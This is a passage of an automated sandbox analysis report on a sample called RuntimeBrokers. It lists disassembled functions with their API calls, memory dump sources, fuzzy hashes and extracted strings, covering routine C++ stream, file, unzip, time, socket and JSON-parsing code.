                                          • Part of subcall function 6C0C46DC: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000,?,?,?,?,00000004), ref: 6C0C486A
                                        • ??Bios_base@std@@QBE_NXZ.MSVCP140(?,?,?,?,00000004), ref: 6C0C7CE7
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@$D@std@@@std@@$?width@ios_base@std@@$H_prolog3$??6?$basic_ostream@?flags@ios_base@std@@Bios_base@std@@V01@V21@@Vios_base@1@$??0?$basic_ios@??0?$basic_iostream@??1?$basic_ios@?getloc@ios_base@std@@?setstate@?$basic_ios@?sgetc@?$basic_streambuf@?widen@?$basic_ios@D@std@@@1@@H_prolog3_catchV?$basic_streambuf@Vlocale@2@
                                        • String ID:
                                        • API String ID: 1933774319-0
                                        • Opcode ID: 8fb3eb2b9165570198aa985be4067cb471e3198d1d5d6b14376b7c83d8c55025
                                        • Instruction ID: e2b18c5c478ade0e0c36879b4cc877c083358bdc879155ff50d7f891ba83b345
                                        • Opcode Fuzzy Hash: 8fb3eb2b9165570198aa985be4067cb471e3198d1d5d6b14376b7c83d8c55025
                                        • Instruction Fuzzy Hash: 9E0192347042089FDF08DFE4D998BEC73F9AF11318F108058E45A97691DF34AA09CA12
                                        Function 6C17E2B3 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C17E2BA
                                        • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,00000034), ref: 6C17E2F8
                                          • Part of subcall function 6C14B7B8: __EH_prolog3_GS.LIBCMT ref: 6C14B7BF
                                        • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,00000034), ref: 6C17E302
                                        • ?UnZipToDir@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@0@Z.COMMON(?,?,?,?,?,?,00000034), ref: 6C17E30F
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$?u8to16@common@ierd_tgp@@D@2@@std@@D@std@@H_prolog3_U?$char_traits@V?$allocator@V?$basic_string@W@2@@4@@$Dir@common@ierd_tgp@@W@2@@std@@0@
                                        • String ID:
                                        • API String ID: 843940637-0
                                        • Opcode ID: 43fa1279ea08e13b252f79fc6b984277c8a1e689ca41ceee69d1a459cc7f54b2
                                        • Instruction ID: 96022defca9159d6527863283c5c92da1c574a53f7b8ea9d54502864960b99a7
                                        • Opcode Fuzzy Hash: 43fa1279ea08e13b252f79fc6b984277c8a1e689ca41ceee69d1a459cc7f54b2
                                        • Instruction Fuzzy Hash: 9F11F7B1D00258DACF04DFE9C881ADDFBB4BF18214F94916DD118B7790D7745A49CB61
                                        Function 6C12FF87 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C12FF8E
                                        • ?extract_path@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV34@@Z.COMMON(?,?,?,?,?,?,?,0000001C), ref: 6C12FFBB
                                          • Part of subcall function 6C12F04B: __EH_prolog3_GS.LIBCMT ref: 6C12F052
                                          • Part of subcall function 6C12F04B: ?has_parent_path@path@filesystem@ierd_tgp@@QBE_NXZ.COMMON(?,00000034), ref: 6C12F078
                                          • Part of subcall function 6C12F04B: ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,00000034), ref: 6C12F088
                                        • ?file_exists@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,?,?,?,?,?,0000001C), ref: 6C12FFCA
                                          • Part of subcall function 6C12F111: _waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,00000000,?,6C12F0F8,?,?,?,?,?,?,?,?,0000001C), ref: 6C12F122
                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,?,0000001C), ref: 6C12FFE1
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3_U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$?extract_path@common@ierd_tgp@@?file_exists@common@ierd_tgp@@?has_parent_path@path@filesystem@ierd_tgp@@?parent_path@path@filesystem@ierd_tgp@@CreateDirectoryV123@V34@@W@2@@std@@W@2@@std@@@_waccess
                                        • String ID:
                                        • API String ID: 2863078902-0
                                        • Opcode ID: 434de3676027248250d8dc3f9779487820ca869baed3dc8985c8c446375f3fe7
                                        • Instruction ID: 4f938fb56c0aca38e48554bf51a0b2b9ced8da5e5bc9dd88b214b24a92422198
                                        • Opcode Fuzzy Hash: 434de3676027248250d8dc3f9779487820ca869baed3dc8985c8c446375f3fe7
                                        • Instruction Fuzzy Hash: 03015A75900209CBCF14CFE4C4849DDBBB8AF1A328F64116DE121B7A90D7399689CB60
                                        Function 004FC450 Relevance: 6.0, APIs: 4, Instructions: 35timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemTimeAsFileTime.KERNEL32(-0000001C,-0000001C,00000000,00000000,004033AF,?,?,?,?,?,?,?,?,?,?,00000400), ref: 004FC45B
                                        • __aulldiv.LIBCMT ref: 004FC46F
                                        • __aullrem.LIBCMT ref: 004FC47D
                                        • __aulldiv.LIBCMT ref: 004FC49E
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Time__aulldiv$FileSystem__aullrem
                                        • String ID:
                                        • API String ID: 1233763301-0
                                        • Opcode ID: d719d65c926360cfe66f1515004846198d494c28216ef2110b9aea5ea0b6fc57
                                        • Instruction ID: 8ffebd17cf527578a311f4300cd6710d7ba8bf83f0d7d5ea99686c14a475cfc5
                                        • Opcode Fuzzy Hash: d719d65c926360cfe66f1515004846198d494c28216ef2110b9aea5ea0b6fc57
                                        • Instruction Fuzzy Hash: 00F0E2766443047AE510EF696C86F5BB7ACEFD1B28F104C29F640A7281D274B8049675
                                        Function 6C14A7BB Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C14A7C2
                                        • StringFromCLSID.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000020), ref: 6C14A7D6
                                        • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000020), ref: 6C14A7F8
                                        • CoTaskMemFree.OLE32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000020), ref: 6C14A804
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?u16to8@common@ierd_tgp@@D@2@@4@@D@std@@FreeFromH_prolog3_StringTaskU?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@std@@W@std@@
                                        • String ID:
                                        • API String ID: 1464910427-0
                                        • Opcode ID: b874c77f3c2591b22f0e2f259d83cc15f76bd8644a9181b77a1a21e1050c712f
                                        • Instruction ID: cce52a27284be0607049dc89c0600f617b6a14ef1d7e3e1c1c0c6f276aed718d
                                        • Opcode Fuzzy Hash: b874c77f3c2591b22f0e2f259d83cc15f76bd8644a9181b77a1a21e1050c712f
                                        • Instruction Fuzzy Hash: 93F04F31D14208EBDF14EFB4C409BDDBBB8EF15325F049114E41077690DB79AA09CB20
                                        Function 6C0D6C50 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C0D6C57
                                        • ?good@ios_base@std@@QBE_NXZ.MSVCP140(00000000,00000004,6C1062DB,00000000,00000030,6C108285,?,00000020), ref: 6C0D6C75
                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP140 ref: 6C0D6C90
                                        • ?good@ios_base@std@@QBE_NXZ.MSVCP140 ref: 6C0D6C9D
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?good@ios_base@std@@$?flush@?$basic_ostream@D@std@@@std@@H_prolog3U?$char_traits@V12@
                                        • String ID:
                                        • API String ID: 3262895407-0
                                        • Opcode ID: c6e273517ca96cf436435a006ed7dc968b374776466f7208f6c263aa0564f3f1
                                        • Instruction ID: 5325ed91ba0b3e8fe110ad4f2d5376f5b8fce83c79c2f4936b34797ed016ef14
                                        • Opcode Fuzzy Hash: c6e273517ca96cf436435a006ed7dc968b374776466f7208f6c263aa0564f3f1
                                        • Instruction Fuzzy Hash: BAF087783012008FDB28DF68C648B6CB7F0AF14319F258449E25A8BB91CB30F900CB96
                                        Function 6C0C6E88 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0C6E8F
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000064), ref: 6C0C6E96
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@H_prolog3_Logger@1@
                                        • String ID:
                                        • API String ID: 2092442621-0
                                        • Opcode ID: 52048ee01d8a121f6d0e958488fed73b41c9a1108ef2385fe448daa23a50feef
                                        • Instruction ID: 28b9a319cb4e4655adf181f3f48f400ddb20117be3dcfa99e9193544263063d2
                                        • Opcode Fuzzy Hash: 52048ee01d8a121f6d0e958488fed73b41c9a1108ef2385fe448daa23a50feef
                                        • Instruction Fuzzy Hash: E2F0F631911214DFDB24D7A4C8017DC77F4AF0530DF24804DD409AB742CBB7A909CBA2
                                        Function 6C1727B7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,00000000,00000000,?,6C17295B,?,?,00000000,?,?,00000010,?,0000000C,6C17384B), ref: 6C1728D6
                                        • __EH_prolog3_catch.LIBCMT ref: 6C1728E3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3_catchXlength_error@std@@
                                        • String ID: map/set<T> too long
                                        • API String ID: 3765788712-1285458680
                                        • Opcode ID: b37f353ca2a4fde14d90a11c0ec1dbb8cc7b6931b321d5dd36dd1cf146634a54
                                        • Instruction ID: d12aa68e1a5e97d941600ac2b998464634539884ab1432cce0e6c98b3e34fd4a
                                        • Opcode Fuzzy Hash: b37f353ca2a4fde14d90a11c0ec1dbb8cc7b6931b321d5dd36dd1cf146634a54
                                        • Instruction Fuzzy Hash: 8F514930604240DFD721CF19C588B49BBF1AF59328F19C488E8599BB62C77AEC56CFA0
                                        Function 6C0A29C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON
                                        Download Yara Rule
                                        APIs
                                        • select.WS2_32(?,?,?,0000002C,00000000), ref: 6C0A2AE7
                                        • __WSAFDIsSet.WS2_32(?,0000002C), ref: 6C0A2B08
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: select
                                        • String ID: @
                                        • API String ID: 1274211008-2766056989
                                        • Opcode ID: 7d941c272327ff357514106dd3f38c368535810d82918e0078faf684e1701cc1
                                        • Instruction ID: a791c5928b261d695eb74d4354226d89a336ed1ed61cc82654c95d15306edb82
                                        • Opcode Fuzzy Hash: 7d941c272327ff357514106dd3f38c368535810d82918e0078faf684e1701cc1
                                        • Instruction Fuzzy Hash: BD416C702087468FC320CFE6C884B57B7F5BF45708F050A2CE49A87A42E775E54ACBA2
                                        Function 6C17674B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,6C17770F,?,?,?,?,6C1768EB,6C17770F,00000000,?,?,00000000,?,0000000C,6C17696A,?), ref: 6C17686A
                                        • __EH_prolog3_catch.LIBCMT ref: 6C176877
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3_catchXlength_error@std@@
                                        • String ID: map/set<T> too long
                                        • API String ID: 3765788712-1285458680
                                        • Opcode ID: a4510f18303bb161d73032e98a3baba4f7a19676cff3ad495f5121ae91f1b4a4
                                        • Instruction ID: 6b226cb115518e20a5a43407f25ecf7f9178423b20657e1b791145d32639a983
                                        • Opcode Fuzzy Hash: a4510f18303bb161d73032e98a3baba4f7a19676cff3ad495f5121ae91f1b4a4
                                        • Instruction Fuzzy Hash: C55158346042458FD721CF19C594B49BBF1AF19328F19C488E859DBB62C77AEC55CF60
                                        Function 6C0F60D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,6C0F751F,?,?,?,?,6C0F6270,6C0F751F,?,?,?,?,?,0000000C,6C0F6385,?), ref: 6C0F61EF
                                        • __EH_prolog3_catch.LIBCMT ref: 6C0F61FC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3_catchXlength_error@std@@
                                        • String ID: map/set<T> too long
                                        • API String ID: 3765788712-1285458680
                                        • Opcode ID: 7ecf3380fef95173480f82dd62e8ab586b8707daf46578bf36158d487171f132
                                        • Instruction ID: 6ce7c74d13cb1a840c0443ea2b53db8e01da1e338422018ebd1f37c0ee4b7d42
                                        • Opcode Fuzzy Hash: 7ecf3380fef95173480f82dd62e8ab586b8707daf46578bf36158d487171f132
                                        • Instruction Fuzzy Hash: C35124306046418FDB01CF19C594B89BBE1BB0A718F1DC488E969DBB62C776EC86CF90
                                        Function 6C1466E2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?,?,?,6C1469DF,?,00000000,?,00000001,00000000,?,00000001,0000000C,6C146943), ref: 6C146801
                                        • __EH_prolog3_catch.LIBCMT ref: 6C14680E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3_catchXlength_error@std@@
                                        • String ID: map/set<T> too long
                                        • API String ID: 3765788712-1285458680
                                        • Opcode ID: 24fe58c1c596de17bef28ec2bcb043a0d16a0a9936f22d868e15dea465d56ca5
                                        • Instruction ID: 53a47b9f1271972017e07889db80a4d3b18b641d2973dd8f21dd27664d26ec7f
                                        • Opcode Fuzzy Hash: 24fe58c1c596de17bef28ec2bcb043a0d16a0a9936f22d868e15dea465d56ca5
                                        • Instruction Fuzzy Hash: A95125342042489FD701CF19C588B89BBE1AF1532CF19C499E959CBB62C77AEC95CF51
                                        Function 6C0AE750 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C0AE8D0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,00000000,Bad unicode escape sequence in string: four digits expected.,0000003C,B33B76E5,-00000002,?), ref: 6C0AE982
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000003,?,expecting another \u token to begin the second half of a unicode surrogate pair,0000004F,?,?,B33B76E5,-00000002,B33B76E5,00000000,00000003), ref: 6C0AE81D
                                          • Part of subcall function 6C0AA8F0: memmove.VCRUNTIME140(?,?,6C0B5839,?,?,00000000,?,?,6C0B5839,?,?), ref: 6C0AA917
                                          • Part of subcall function 6C0AE8D0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,00000000,Bad unicode escape sequence in string: hexadecimal digit expected.,00000042,B33B76E5,-00000002,?), ref: 6C0AEA3B
                                        Strings
                                        • expecting another \u token to begin the second half of a unicode surrogate pair, xrefs: 6C0AE89E
                                        • additional six characters expected to parse unicode surrogate pair., xrefs: 6C0AE7BF
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$memmove
                                        • String ID: additional six characters expected to parse unicode surrogate pair.$expecting another \u token to begin the second half of a unicode surrogate pair
                                        • API String ID: 15630516-1961466578
